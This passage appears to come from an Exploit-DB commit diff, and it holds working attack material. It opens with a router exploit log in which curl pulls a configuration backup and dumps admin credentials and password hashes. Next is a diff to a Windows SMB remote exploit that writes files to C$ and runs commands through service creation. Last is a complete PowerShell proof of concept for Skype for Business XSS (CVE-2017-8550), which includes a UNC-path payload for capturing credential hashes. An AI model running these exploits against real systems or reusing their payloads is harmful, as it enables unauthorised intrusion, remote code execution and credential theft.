53 10467 53 5528 0 0 5974 0 0:00:01 --:--:-- 0:00:01 5969* Curl_http_done: called premature == 0
100 10467 100 10467 0 0 11290 0 --:--:-- --:--:-- --:--:-- 11279
* Connection #0 to host 192.168.0.1 left intact
bash-4.4$ file running.CFG
running.CFG: gzip compressed data, last modified: Wed Jul 12 19:12:36 2017, max compression, from Unix
bash-4.4$ gunzip -v -d --suffix .CFG running.CFG ; tar -xf running ; cd etc ; cat web_user
running.CFG: 85.6% -- replaced with running
admin:admin123:2
user:user:1
bash-4.4$
Or just:
bash-4.4$ curl -O http://180.148.2.139/running.CFG
bash-4.4$ tar -zxf running.CFG
bash-4.4$ cd etc
bash-4.4$ ls
INPUT_FILTER.conf fire_wall.conf lan_static_ip.conf ntp.conf radvd_param.conf upnpigd.conf
INPUT_REMOTE_ACCESS.conf fire_wall.sh lighttpd.conf other_security_status.sh remote_mgmt.conf user_ipv6tables.conf
dasan_output.txt hostname localtime passwd routing_entry.conf user_wan_cfg.conf
dhcp_client_dns.sh inet_check_file mac_filter.conf port_forward.conf shadow wan_ppp_mode.conf
dhcp_client_dynamic_default_dns.conf ipupdate.conf mac_source_match.conf port_forward.sh snmp web-enable
dhcpv6d.conf ipv6_route.conf multi_language.conf port_forward_dnat.sh snmp_status.conf web_user
dhcpv6d_param.conf is_safe_nat_option nat_route.conf port_forward_gre.sh sys_login_max_num webrefreshtime.conf
dmz.conf lan_dhcp_model.sh net_rest.conf ppp syslog.confx websesstime.conf
ds_mode_config lan_dhcp_server_static_ip.conf ns_ftp.conf radvd.conf udhcpd.conf
bash-4.4$ cat web_user
admin:admin123:2
user:user:1
bash-4.4$ cat ./.config/ds_user_pw
admin
bash-4.4$ cat passwd
admin:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:admin:/etc:/bin/sh
root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:root:/etc:/bin/sh

18
platforms/windows/remote/42315.py
View file

@ -458,7 +458,7 @@ def exploit(target, pipe_name):
return True
def smb_pwn(conn):
smbConn = smbconnection.SMBConnection(conn.get_remote_host(), conn.get_remote_host(), existingConnection=conn, manualNegotiate=True)
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
@ -466,10 +466,15 @@ def smb_pwn(conn):
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
#service_exec(smbConn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
with open(localSrc, 'rb') as fp:
smbConn.putFile(remoteDrive + '$', remotePath, fp.read)
# based on impacket/examples/serviceinstall.py
def service_exec(smbConn, cmd):
def service_exec(conn, cmd):
import random
import string
from impacket.dcerpc.v5 import transport, srvs, scmr
@ -477,13 +482,12 @@ def service_exec(smbConn, cmd):
service_name = ''.join([random.choice(string.letters) for i in range(4)])
# Setup up a DCE SMBTransport with the connection already in place
rpctransport = transport.SMBTransport(smbConn.getRemoteHost(), smbConn.getRemoteHost(), filename=r'\svcctl', smb_connection=smbConn)
rpcsvc = rpctransport.get_dce_rpc()
rpcsvc = conn.get_dce_rpc('svcctl')
rpcsvc.connect()
rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
svnHandle = None
try:
print("Opening SVCManager on %s....." % smbConn.getRemoteHost())
print("Opening SVCManager on %s....." % conn.get_remote_host())
resp = scmr.hROpenSCManagerW(rpcsvc)
svcHandle = resp['lpScHandle']
@ -518,7 +522,7 @@ def service_exec(smbConn, cmd):
scmr.hRDeleteService(rpcsvc, serviceHandle)
scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)
except Exception, e:
print("ServiceExec Error on: %s" % smbConn.getRemoteHost())
print("ServiceExec Error on: %s" % conn.get_remote_host())
print(str(e))
finally:
if svcHandle:

101
platforms/windows/remote/42316.ps1 Executable file
View file

@ -0,0 +1,101 @@
# Exploit Title: Skype for Business 2016 XSS Injection - CVE-2017-8550
#
# Exploit Author: @nyxgeek - TrustedSec
# Date: 2017-04-10
# Vendor Homepage: www.microsoft.com
# Versions: 16.0.7830.1018 32-bit & 16.0.7927.1020 64-bit or lower
#
#
# Requirements: Originating machine needs Lync 2013 SDK installed as well as a user logged
# into the Skype for Business client locally
#
#
# Description:
#
# XSS injection is possible via the Lync 2013 SDK and PowerShell. No user-interaction is
# required for the XSS to execute on the target machine. It will run regardless of whether
# or not they accept the message. The target only needs to be online.
#
# Additionally, by forcing a browse to a UNC path via the file URI it is possible to
# capture hashed user credentials for the current user.
# Example:
# <script>document.location.replace=('file:\\\\server.ip.address\\test.txt');</script>
#
#
# Shoutout to @kfosaaen for providing the base PowerShell code that I recycled
#
#
# Timeline of Disclosure
# ----------------------
# 4/24/2017 Submitted to Microsoft
# 5/09/2017 Received confirmation that they were able to reproduce
# 6/14/2017 Fixed by Microsoft
#target user
$target = "username@domain.com"
# For this example we will force the user to navigate to a page of our choosing (autopwn?)
# Skype uses the default browser for this.
$message = "PoC Skype for Business 2016 XSS Injection<script>document.location.href=('http://www.youtube.com/watch?v=9Rnr70wCQSA')</script>"
if (-not (Get-Module -Name Microsoft.Lync.Model))
{
try
{
# you may need to change the location of this DLL
Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
}
catch
{
Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
}
}
# Connect to the local Skype process
try
{
$client = [Microsoft.Lync.Model.LyncClient]::GetClient()
}
catch
{
Write-Host "`nMust be signed-in to Skype"
break
}
#Start Conversation
$msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"
#Add the Message
$msg.Add(1,$message)
# Add the contact URI
try
{
$contact = $client.ContactManager.GetContactByUri($target)
}
catch
{
Write-Host "`nFailed to lookup Contact"$target
break
}
# Create a conversation
$convo = $client.ConversationManager.AddConversation()
$convo.AddParticipant($contact) | Out-Null
# Set the message mode as IM
$imModality = $convo.Modalities[1]
# Send the message
$imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null
# End the Convo to suppress the UI
$convo.End() | Out-Null
Write-Host "Sent the following message to "$target":`n"$message